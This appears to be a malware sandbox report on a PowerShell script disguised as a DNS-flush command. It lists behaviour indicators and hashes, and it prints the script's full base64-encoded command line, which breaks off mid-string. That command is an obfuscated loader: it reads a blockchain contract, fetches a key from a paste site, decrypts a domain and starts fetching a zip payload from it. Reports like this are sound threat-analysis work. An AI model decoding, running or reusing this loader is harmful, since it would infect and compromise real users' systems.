File name:

ipconfig flushdns.ps1

Full analysis: https://app.any.run/tasks/dd630652-6852-44ef-96c8-7ea02c751a48
Verdict: Malicious activity
Analysis date: June 13, 2024, 10:57:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (5338), with CRLF line terminators
MD5:

AF02030C000D14EF96B9C90C2DE64AA1

SHA1:

510B53E4D916E52E3BA4D098C77A1BBBCFE6B791

SHA256:

A45FDFFFE831B4245EC8876D7E85CC8D2ED54693115381B26F5385716E72F91E

SSDEEP:

96:XnPSG1jM0o+AmV1g63pK2x1VXL/Rsi3lXQH7IJuYqF8qar+I4XPpefmHcytYqtCS:3PSGhMtbmVOl8Ci1AH7z5KSI6Skt57Mg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 2108)
  • SUSPICIOUS

    • Process uses IPCONFIG to clear DNS cache

      • powershell.exe (PID: 3972)
    • Reads the Internet Settings

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 3972)
    • Application launched itself

      • powershell.exe (PID: 3972)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 3972)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3972)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 3972)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2108)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 2108)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2108)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2108)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Creates a byte array (POWERSHELL)

      • powershell.exe (PID: 3972)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2108)
    • Checks supported languages

      • wmpnscfg.exe (PID: 1440)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 1440)
    • Reads the computer name

      • wmpnscfg.exe (PID: 1440)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe ipconfig.exe no specs powershell.exe wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1440"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2108"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JAAwADgAdABmAHAAUwBLAFoARQBqAG0AbABrADMAQQBoADkAZABYAFAATwBRAFcAeAA2AFQARgBuAEsAMwBJAE4AZgBUADEAMQAzAFEAcgBjAHQAdwBUAEwAUQBzAFQAVwBKAFMASgBSAGkAVABuAHAANABVAE4AOQAxAEIAZwA3ADYAeQBBAEsAMQBPAFcAdwBYADkARQBhAGMAcgB6AHoATwBoADkAeQA0ADEAegBkAFYAQgBjAGMAUQBRAEUAZQBQAHIATwB4AFkAdgBRAG8AWABFAEsAMABFADAAcQBBAHUAZgB5AGMAaABMAFkAVABnAFEAZQA1AG4AQwBHAE4AYQBvAGcARwBHAEwATwBQAGUAbwA0ADkAWAB6AEgAMgAzAGwAegBtAHcAQwBLAFMAQQBOAHYAMABnAG8AcABXAFoAdwBGAE4ATwBHAHkAbQBMAHAAMgBWAGkARgBjAEwARwBaAGYAaABHAE4ANgBqAEUAbQBiAGEAWABmAHQAdgBEAGEAVQB4AGYAbQAzAGMAcwBrAHMAOAB1AHYASgBrAHcARQBHAEcAWgBJAFcAWABLAGYANABwAHoAeAB1AG8AQgAwAEwANwBJAHcAZQBQAG8AWgBJAGMAWgBLAFoAUQAxAEoAUwB6AHkARgAwAEYAcABVAEMAWQB3AHMAUgB2AE0AdQB2AE4AYgB2AEcASABvAE8AUAB5AEQAagBwAHUAcQA0AEIANgBRAEcAbQAxAHEAbQBrAEkAWgAwAFQAUwBrAG0AcgBoAEIAaAA4AG0AbQBCAHQAOQBCAHcAZABNAFkAbwBNAEkAZgBSAEoANgBUAGUAOQBxAHYAUwBWAHgASAByAG0ARgBkAEoAWABCADQAZwA0ADUAZwBjAE0AYQA4ADEAUQBQAGgAdgBUAEsAaABTAFEAUQBvAFIAVQBjAG0AUgBQAEQATAB6ADMAQgA2ADMAdAA5AEsASAB1AG8AaQBPAFUANgBLAE8ARgA4AEUARAB4AEsAdABtAEIAbwB4ADQAcgBkAEsATgBGAHEAWABiAHAAVwB1AG8ASQBUAEYAWABhAHUAUQBTAFgAawA4ADUAWABsADYAYQBpAG8AOABJAHcANgA0AFkATwBmAEYAQgBHADMAZgB6AHoANQBUADAAbQBYAEkAdABnAGYAcwA0AEEAbwBsAEcAbwBwAFkAegBuAFQAbgBSAEYAVABQAG4AaQBqAGIAYgBZADgAcgBnAHkAUwBsAG8AeABrAHIAUgBLAGUASgBTAGYATABQADAAeQBMAGsAMQBNAFQAZQBtAEcAbQBhADYAagBIAGIAUABBAFAASABkAG8ASgBrAEMAUwBJAFUATgBwAEUAaABTAEMANgBNAGsAOQBrAHIAMgB0ACAAPQAgACIARwBlAHQAQgAiAAoACgAKAAoAJAB1AHcAagA0AHgASgBSAGQAbwBZAEwAeQA0AHUAaABmAFYASgAyADYAaABYAEYAWAA4AEcAUgBZADcAMgBHAGsAYwA1AHYAcgBVADQAcgBqAHIAOABjAGYATABMAFIAegBEAHAAdABXAGcANQBvAHIAVABZAFEAZABRADIAZgBmAG0AMQByADEARwBwAHoAVQBEAEMAbQAyAEoAawB4AEkARwB1AHgAOQBZAGcAQgBoAEgAUwBnAHEAUAB6AEUAaABQAFYAUgA2AHgAbwBoAEQAQgBZAFUASAB1AFoAbQBGAGYAUABiAFAAbABKAFEANgAwAEYAVwB6AGEAUgBxAGcAcwBhAHAAdQBmAEEAWABZAEwAVwBYAEYAegBxAEEAbQBhAG4AVABHAGsAbwAzAFkAMABxAHIAcABvAG8AOQBuAHIAbwAxAEMAdgAzAHQATQBIAEYATwBUAE8ANABnAEQAZQA3ADAASABlADgAMAAwAEgAcABxADkAZwAzADAAeABuAFEASQBlAHUASABHADcAWAAxAFIASgAzAGEARQBHAEMAUgB3AEQARgBvAE4ANgBGAFgARQA2AFoAcwBWAEkAZAB4AGoANABYADUAYwBtAEcAVgBpAFYATgByADYARwA4AGUAVABVADYAcQB4AGgAOQBWAHAAagBWAHYATABkAFIAQgAwAEcARwBDAFEAdgBOAHEARgA4AFUAVQBTADcAQgBiAGIAdQA1AGoAZQBiAEYAWQBIADAANwA3AFEATwBUAHIAVABBAGkAZABHAEUAQQAzADUAYwBhAHEAZgBGAGoAawBmAG8AdwBRAGYAQgB1AHMAegBqAGUAeQBFAGQAWABNAGQAVABQAFgAbwAyAEQAdwBsAFkAegByADYAWgA0AG0ANABuADUAcAA3AGkAbgBUAEUAWQBUAGYASgB0AHgAUwBMAEEASQBmAHUARwBhADQAdwB0AFgASgB3AHgAdwAgAD0AIAAiAHkAdABlAHMAIgAKAAoACgAKACQATgB2AHUARQBQAGQAOQBWAGUAcwBxAGsAZQAzADMAVgBUAGcAdQBRAHIAaAA0ADQANwBrAEcAbABnAGgAcABmAGYAaABTAE4AMAAxADYAVQBXADkAaQBBAGoAaQA5AHcAWQB0AFgAbgBXAEUATABhADAAbgBYAEMAUwBoAHEANwB4AEcAVQA0AGYAWQBIAEQAYwBJAFAAdwB1AGgATQBsADEAZgB2AGMAZwBvAE4AYgB1ADkAOABoAEEAVwBOAGkAdwBnAHoAUQBFADYAYQB4AHgARgBHADkARwA1AGQAbAB0AEcAOQB1AGkAbQB3AHYAOQBsAHoAMQBpAEwANgBXADMASABuAEMAcwBmAHkARwBuAHAAbABRAHEANAByAGUAZABxAEUAdgBmADMAYQBWAE4AeAAwADQATgAwAHMAUQBFAGcAaQBnAGcAVABQAHkARQB3AHEASABiAGYAVwBYAEIAagBxAEsAVQBnAFIAOAB5AE0AYwBvAHEAawBaAHMAVwBrAFQAbwAzADQAeAAwAEIAUwBSAGsAZAB6AFYAcwB3ADUAYQBiAGEANABlADMAbAA5AGIAdABPAFEAWABYAHUAbAAxADUAMgBKAHUAegBBAG0ARgBjAEoAVgByAEIARwBPAFQASwBDADkAZABZAEkAYwB5AGcAUgBxAGoARQA2AHgAdgAxAEkARgBtADkATQBmADcAYgBNAGIAOAB0AFUAMwBWAGMAQwBmAFMAWABQAHUASQBLAHQAagB1ADYAeAB5AG0AawBZAEIAZQBWADYAcQBFAGMARABWAHcAYQAwAFoASwBEAGcASwB0ADYAawBRAHoATwA2AFUAWQBHAGkAaQBHAHkAQQBqADkAQQBTADgAZgBuAEwAWgB5AFgAMQBiADcAegA5AEUAbQA3AHkAYgBiAFgAZQBSADIAaAA3AEoAOAB5ADQAcAB4AGoAWQBvAGkAaABRAEEAcgBqAG8ANQBsAHQATQBNAGQASwBGAHAAQgA5AFMAZAA0AEQAMgA5ADEAUwBtAGQAdQBwAEgAYQBaAEUAUwBTAFYAdQB5AEkAbgAyAEYARABVAHcAQQBOAEkAWQB3ADIAcQBoADMAUQBMAG0AdgBOAFgATABjAFYAeAAxAHcASgB6AG4AZgAgAD0AIAAoACQAMAA4AHQAZgBwAFMASwBaAEUAagBtAGwAawAzAEEAaAA5AGQAWABQAE8AUQBXAHgANgBUAEYAbgBLADMASQBOAGYAVAAxADEAMwBRAHIAYwB0AHcAVABMAFEAcwBUAFcASgBTAEoAUgBpAFQAbgBwADQAVQBOADkAMQBCAGcANwA2AHkAQQBLADEATwBXAHcAWAA5AEUAYQBjAHIAegB6AE8AaAA5AHkANAAxAHoAZABWAEIAYwBjAFEAUQBFAGUAUAByAE8AeABZAHYAUQBvAFgARQBLADAARQAwAHEAQQB1AGYAeQBjAGgATABZAFQAZwBRAGUANQBuAEMARwBOAGEAbwBnAEcARwBMAE8AUABlAG8ANAA5AFgAegBIADIAMwBsAHoAbQB3AEMASwBTAEEATgB2ADAAZwBvAHAAVwBaAHcARgBOAE8ARwB5AG0ATABwADIAVgBpAEYAYwBMAEcAWgBmAGgARwBOADYAagBFAG0AYgBhAFgAZgB0AHYARABhAFUAeABmAG0AMwBjAHMAawBzADgAdQB2AEoAawB3AEUARwBHAFoASQBXAFgASwBmADQAcAB6AHgAdQBvAEIAMABMADcASQB3AGUAUABvAFoASQBjAFoASwBaAFEAMQBKAFMAegB5AEYAMABGAHAAVQBDAFkAdwBzAFIAdgBNAHUAdgBOAGIAdgBHAEgAbwBPAFAAeQBEAGoAcAB1AHEANABCADYAUQBHAG0AMQBxAG0AawBJAFoAMABUAFMAawBtAHIAaABCAGgAOABtAG0AQgB0ADkAQgB3AGQATQBZAG8ATQBJAGYAUgBKADYAVABlADkAcQB2AFMAVgB4AEgAcgBtAEYAZABKAFgAQgA0AGcANAA1AGcAYwBNAGEAOAAxAFEAUABoAHYAVABLAGgAUwBRAFEAbwBSAFUAYwBtAFIAUABEAEwAegAzAEIANgAzAHQAOQBLAEgAdQBvAGkATwBVADYASwBPAEYAOABFAEQAeABLAHQAbQBCAG8AeAA0AHIAZABLAE4ARgBxAFgAYgBwAFcAdQBvAEkAVABGAFgAYQB1AFEAUwBYAGsAOAA1AFgAbAA2AGEAaQBvADgASQB3ADYANABZAE8AZgBGAEIARwAzAGYAegB6ADUAVAAwAG0AWABJAHQAZwBmAHMANABBAG8AbABHAG8AcABZAHoAbgBUAG4AUgBGAFQAUABuAGkAagBiAGIAWQA4AHIAZwB5AFMAbABvAHgAawByAFIASwBlAEoAUwBmAEwAUAAwAHkATABrADEATQBUAGUAbQBHAG0AYQA2AGoASABiAFAAQQBQAEgAZABvAEoAawBDAFMASQBVAE4AcABFAGgAUwBDADYATQBrADkAawByADIAdAAgACsAIAAkAHUAdwBqADQAeABKAFIAZABvAFkATAB5ADQAdQBoAGYAVgBKADIANgBoAFgARgBYADgARwBSAFkANwAyAEcAawBjADUAdgByAFUANAByAGoAcgA4AGMAZgBMAEwAUgB6AEQAcAB0AFcAZwA1AG8AcgBUAFkAUQBkAFEAMgBmAGYAbQAxAHIAMQBHAHAAegBVAEQAQwBtADIASgBrAHgASQBHAHUAeAA5AFkAZwBCAGgASABTAGcAcQBQAHoARQBoAFAAVgBSADYAeABvAGgARABCAFkAVQBIAHUAWgBtAEYAZgBQAGIAUABsAEoAUQA2ADAARgBXAHoAYQBSAHEAZwBzAGEAcAB1AGYAQQBYAFkATABXAFgARgB6AHEAQQBtAGEAbgBUAEcAawBvADMAWQAwAHEAcgBwAG8AbwA5AG4AcgBvADEAQwB2ADMAdABNAEgARgBPAFQATwA0AGcARABlADcAMABIAGUAOAAwADAASABwAHEAOQBnADMAMAB4AG4AUQBJAGUAdQBIAEcANwBYADEAUgBKADMAYQBFAEcAQwBSAHcARABGAG8ATgA2AEYAWABFADYAWgBzAFYASQBkAHgAagA0AFgANQBjAG0ARwBWAGkAVgBOAHIANgBHADgAZQBUAFUANgBxAHgAaAA5AFYAcABqAFYAdgBMAGQAUgBCADAARwBHAEMAUQB2AE4AcQBGADgAVQBVAFMANwBCAGIAYgB1ADUAagBlAGIARgBZAEgAMAA3ADcAUQBPAFQAcgBUAEEAaQBkAEcARQBBADMANQBjAGEAcQBmAEYAagBrAGYAbwB3AFEAZgBCAHUAcwB6AGoAZQB5AEUAZABYAE0AZABUAFAAWABvADIARAB3AGwAWQB6AHIANgBaADQAbQA0AG4ANQBwADcAaQBuAFQARQBZAFQAZgBKAHQAeABTAEwAQQBJAGYAdQBHAGEANAB3AHQAWABKAHcAeAB3ACkACgAKACQAdQBSAEkAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYgBzAGMALQBkAGEAdABhAHMAZQBlAGQAMQAuAGIAaQBuAGEAbgBjAGUALgBvAHIAZwAvACIACgAKACQAUABBAFkAbABPAGEARAAgAD0AIABAAHsACgAKACAAIAAgACAAagBzAG8AbgByAHAAYwAgAD0AIAAiADIALgAwACIACgAKACAAbQBlAHQAaABvAGQAIAA9ACAAIgBlAHQAaABfAGMAYQBsAGwAIgAKAAoAIABwAGEAcgBhAG0AcwAgAD0AIABAACgACgAKACAAIAAgACAAIABAAHsACgAKACAAdABvACAAPQAgACIAMAB4AEMAMQAyAGQAMABjAEEANgA1AGIAOABiAEMAOAA3ADIANgA1AGIAMwAzAEMAMQAzAEIAYQBiADQANwA5AGUANQBEADkAMQBjAGMAMAA4AGUAIgAKAAoAZABhAHQAYQAgAD0AIAAiADAAeABjADIAZgBiADIANgBhADYAIgAKAAoAIAAgACAAIAB9ACwACgAKACAAIAAgACAAIAAgACAAIAAgACIAbABhAHQAZQBzAHQAIgAKAAoAIAAgACAAKQAKAAoAIAAgACAAIABpAGQAIAA9ACAANAA0AAoACgB9AAoACgAkAGoAUwBPAE4AUABhAHkATABPAGEAZAAgAD0AIAAkAFAAQQBZAGwATwBhAEQAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuAAoACgAkAFIARQBTAHAAbwBOAFMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJAB1AFIASQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJABqAFMATwBOAFAAYQB5AEwATwBhAGQAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiAAoACgBpAGYAIAAoACQAUgBFAFMAcABvAE4AUwBlAC4AUABTAE8AYgBqAGUAYwB0AC4AUAByAG8AcABlAHIAdABpAGUAcwAuAE4AYQBtAGUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACcAcgBlAHMAdQBsAHQAJwApACAAewAKAAoAIAAgAHIAZQB0AHUAcgBuAAoACgB9AAoACgAkAHIAZQBzAFUAbABUACAAPQAgACQAUgBFAFMAcABvAE4AUwBlAC4AcgBlAHMAdQBsAHQACgAKAGkAZgAgACgAJAByAGUAcwBVAGwAVAAuAFMAdABhAHIAdABzAFcAaQB0AGgAKAAiADAAeAAiACkAKQAgAHsACgAKACAAIAAgACAAIAAkAHIAZQBzAFUAbABUACAAPQAgACQAcgBlAHMAVQBsAFQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADIAKQAKAAoAfQAKAAoAJABiAGkAbgBBAFIAWQB2AEEATAB1AEUAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAcgBlAHMAVQBsAFQALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkACgAKAGYAbwByACAAKAAkAEkAIAA9ACAAMAA7ACAAJABJACAALQBsAHQAIAAkAHIAZQBzAFUAbABUAC4ATABlAG4AZwB0AGgAOwAgACQASQAgACsAPQAgADIAKQAgAHsACgAKACAAIAAgACAAJABiAGkAbgBBAFIAWQB2AEEATAB1AEUAWwAkAEkAIAAvACAAMgBdACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAcgBlAHMAVQBsAFQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQASQAsACAAMgApACwAIAAxADYAKQAKAAoAfQAKAAoAJABBAFMAYwBJAEkAXwBUAGUAeAB0ACAAPQAgAFsAUwBZAHMAVABFAG0ALgB0AGUAeAB0AC4AZQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAGkAbgBBAFIAWQB2AEEATAB1AEUAKQAKAAoAJABwAEEAcgB0AHMAIAA9ACAAQAAoACQAQQBTAGMASQBJAF8AVABlAHgAdAAgAC0AcwBwAGwAaQB0ACAAIgBgADAAIgApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAKACAAIAAgACAAaQBmACAAKAAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMQApACAAewAgACQAXwAuAFMAdQBiAHMAdAByAGkAbgBnACgAMQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABfACAAfQAKAAoAfQAKAAoAJABEAE8AbQBhAGkAbgAgAD0AIAAoAC0AagBvAGkAbgAgACQAcABBAHIAdABzACkALgBUAHIAaQBtAFMAdABhAHIAdAAoACkACgAKAGkAZgAgACgALQBuAG8AdAAgACQARABPAG0AYQBpAG4AKQAgAHsACgAKACAAIAAgACAAcgBlAHQAdQByAG4ACgAKAH0ACgAKAAoACgBmAHUAbgBjAHQAaQBvAG4AIABIAGUAeABTAHQAcgBpAG4AZwBgAFQAbwBCAHkAdABlAEEAcgByAGEAeQAoACQASABlAHgAUwB0AHIASQBuAEcAKQAgAHsACgAKACAAIAAgACAAJABCAHkAdABFAFMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQBUAGUAWwBdACAAKAAkAEgAZQB4AFMAdAByAEkAbgBHAC4ATABlAG4AZwB0AGgAIAAvACAAMgApAAoACgBmAG8AcgAgACgAJABJACAAPQAgADAAOwAgACQASQAgAC0AbAB0ACAAJABCAHkAdABFAFMALgBMAGUAbgBnAHQAaAA7ACAAJABJACsAKwApACAAewAKAAoAIAAgACAAIAAkAEIAeQB0AEUAUwBbACQASQBdACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQASABlAHgAUwB0AHIASQBuAEcALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQASQAgACoAIAAyACwAIAAyACkALAAgADEANgApAAoACgAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAEIAeQB0AEUAUwAKAAoAfQAKAAoACgAKACQAYQAxAGIAMgBDADMAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBjAG8ALwB0ADUAMgA2ADYAcQAzAHAALwByAGEAdwAiAAoACgAkAFgAOQB5ADgAegA3ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAGEAMQBiADIAQwAzACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAAoAJABJAFYAQwBPAE4AdABFAG4AdAAgAD0AIAAkAFgAOQB5ADgAegA3AC4AQwBvAG4AdABlAG4AdAAuAFQAcgBpAG0AKAApAAoACgAKAAoAZgB1AG4AYwB0AGkAbwBuACAAagBUAHkAYABIAEIASwBrAHUAawBqAGsAYABoAGQAQQBkAEMAeQBSAGAAQQBxAFYAYABVAEoAdgBgAFgAdQB2AFoAYABqAGMAZQBwAGcAYABJAGYATwB4AGAAegBhAGYAIAB7AAoACgBwAGEAcgBhAG0AIAAoAAoACgAgACAAWwBzAHQAcgBpAG4AZwBdACQARQBOAGMAUgB5AFAAVABlAEQAVABFAFgAVAAsAAoACgAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAawBFAFkALAAKAAoAIAAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQASQBuAGkAVABJAGEATABpAFoAQQBUAGkAbwBOAHYARQBDAHQAbwByAAoACgAgACAAKQAKAAoAIAAgACAAIAAkAFUAVABGADgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFUAVABGADgARQBuAGMAbwBkAGkAbgBnAAoACgAgACAAIAAkAEMASQBwAGgAZQByAGIAeQB0AEUAUwAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQARQBOAGMAUgB5AFAAVABlAEQAVABFAFgAVAApAAoACgAgACAAIAAgACAAIAAgACQAQQBFAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBNAGEAbgBhAGcAZQBkAAoACgAkAEEARQBzAC4ATQBvAGQAZQAgAD0AIABbAHMAWQBzAHQARQBNAC4AUwBFAEMAdQBSAGkAVAB5AC4AQwByAFkAUAB0AE8ARwBSAEEAUABIAHkALgBDAEkAUABIAGUAUgBtAE8AZABlAF0AOgA6AEMAQgBDAAoACgAgACAAIAAgACQAQQBFAHMALgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwBZAHMAdABlAE0ALgBzAGUAQwB1AFIAaQBUAFkALgBDAHIAeQBwAFQATwBHAHIAYQBwAEgAWQAuAFAAQQBEAEQASQBuAEcATQBPAEQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAJABBAEUAcwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMQAyADgACgAKACAAJABBAEUAcwAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4AAoACgAgACAAJABBAEUAcwAuAEsAZQB5ACAAPQAgACQAVQBUAEYAOAAuACQATgB2AHUARQBQAGQAOQBWAGUAcwBxAGsAZQAzADMAVgBUAGcAdQBRAHIAaAA0ADQANwBrAEcAbABnAGgAcABmAGYAaABTAE4AMAAxADYAVQBXADkAaQBBAGoAaQA5AHcAWQB0AFgAbgBXAEUATABhADAAbgBYAEMAUwBoAHEANwB4AEcAVQA0AGYAWQBIAEQAYwBJAFAAdwB1AGgATQBsADEAZgB2AGMAZwBvAE4AYgB1ADkAOABoAEEAVwBOAGkAdwBnAHoAUQBFADYAYQB4AHgARgBHADkARwA1AGQAbAB0AEcAOQB1AGkAbQB3AHYAOQBsAHoAMQBpAEwANgBXADMASABuAEMAcwBmAHkARwBuAHAAbABRAHEANAByAGUAZABxAEUAdgBmADMAYQBWAE4AeAAwADQATgAwAHMAUQBFAGcAaQBnAGcAVABQAHkARQB3AHEASABiAGYAVwBYAEIAagBxAEsAVQBnAFIAOAB5AE0AYwBvAHEAawBaAHMAVwBrAFQAbwAzADQAeAAwAEIAUwBSAGsAZAB6AFYAcwB3ADUAYQBiAGEANABlADMAbAA5AGIAdABPAFEAWABYAHUAbAAxADUAMgBKAHUAegBBAG0ARgBjAEoAVgByAEIARwBPAFQASwBDADkAZABZAEkAYwB5AGcAUgBxAGoARQA2AHgAdgAxAEkARgBtADkATQBmADcAYgBNAGIAOAB0AFUAMwBWAGMAQwBmAFMAWABQAHUASQBLAHQAagB1ADYAeAB5AG0AawBZAEIAZQBWADYAcQBFAGMARABWAHcAYQAwAFoASwBEAGcASwB0ADYAawBRAHoATwA2AFUAWQBHAGkAaQBHAHkAQQBqADkAQQBTADgAZgBuAEwAWgB5AFgAMQBiADcAegA5AEUAbQA3AHkAYgBiAFgAZQBSADIAaAA3AEoAOAB5ADQAcAB4AGoAWQBvAGkAaABRAEEAcgBqAG8ANQBsAHQATQBNAGQASwBGAHAAQgA5AFMAZAA0AEQAMgA5ADEAUwBtAGQAdQBwAEgAYQBaAEUAUwBTAFYAdQB5AEkAbgAyAEYARABVAHcAQQBOAEkAWQB3ADIAcQBoADMAUQBMAG0AdgBOAFgATABjAFYAeAAxAHcASgB6AG4AZgAoACQAawBFAFkAKQAKAAoAIAAkAEEARQBzAC4ASQBWACAAPQAgAEgAZQB4AFMAdAByAGkAbgBnAFQAbwBCAHkAdABlAEEAcgByAGEAeQAoACQASQBuAGkAVABJAGEATABpAFoAQQBUAGkAbwBOAHYARQBDAHQAbwByACkACgAKACAAIAAgACAAIAAgACAAIAAkAFQAUgBBAE4AUwBmAE8AUgBtACAAPQAgACQAQQBFAHMALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkACgAKACAAIAAgACAAIAAgACQAUABMAEEAaQBuAEIAeQBUAGUAUwAgAD0AIAAkAFQAUgBBAE4AUwBmAE8AUgBtAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAQwBJAHAAaABlAHIAYgB5AHQARQBTACwAIAAwACwAIAAkAEMASQBwAGgAZQByAGIAeQB0AEUAUwAuAEwAZQBuAGcAdABoACkACgAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAUABMAEEAaQBuAEIAeQBUAGUAUwApAAoACgB9AAoACgAKAAoAJABLAGUAWQAgAD0AIABbAFMAWQBzAFQARQBtAC4AdABlAHgAdAAuAGUAbgBjAG8AZABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBTAFQARQBNAC4AYwBPAE4AdgBlAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBTAGoAVgBRAFIAVwBJADIAVwBFAHAAbQBiAFgAbABMAFYAWABGADIATgB3AD0APQAiACkAKQAKAAoAJABJAFYAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBOAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAUwBUAEUATQAuAGMATwBOAHYAZQBSAFQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASQBWAEMATwBOAHQARQBuAHQAKQApAAoACgAkAEQAYwBTADEAIAA9ACAAagBUAHkASABCAEsAawB1AGsAagBrAGgAZABBAGQAQwB5AFIAQQBxAFYAVQBKAHYAWAB1AHYAWgBqAGMAZQBwAGcASQBmAE8AeAB6AGEAZgAgAC0ARQBuAGMAcgB5AHAAdABlAGQAVABlAHgAdAAgACQARABPAG0AYQBpAG4AIAAtAEsAZQB5ACAAJABLAGUAWQAgAC0ASQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAFYAZQBjAHQAbwByACAAJABJAFYACgAKAAoACgAkAFMAQwByAEkAUABUAGIATABvAEMAawAgAD0AIAB7AAoACgAgACAAcABhAHIAYQBtACAAKAAkAEcAYwBzADEAKQAKAAoAIAAgACAAIAAgACAAJAB1AHIAbAAxACAAPQAgACIAaAB0AHQAcABzADoALwAvACQARABjAFMAMQAvAGQAZgAvAGQAYQB0AGEALgB6AGkAcAAiAAoACgAgACAAIAAgACAAIAAgACQAdQByAEwAMg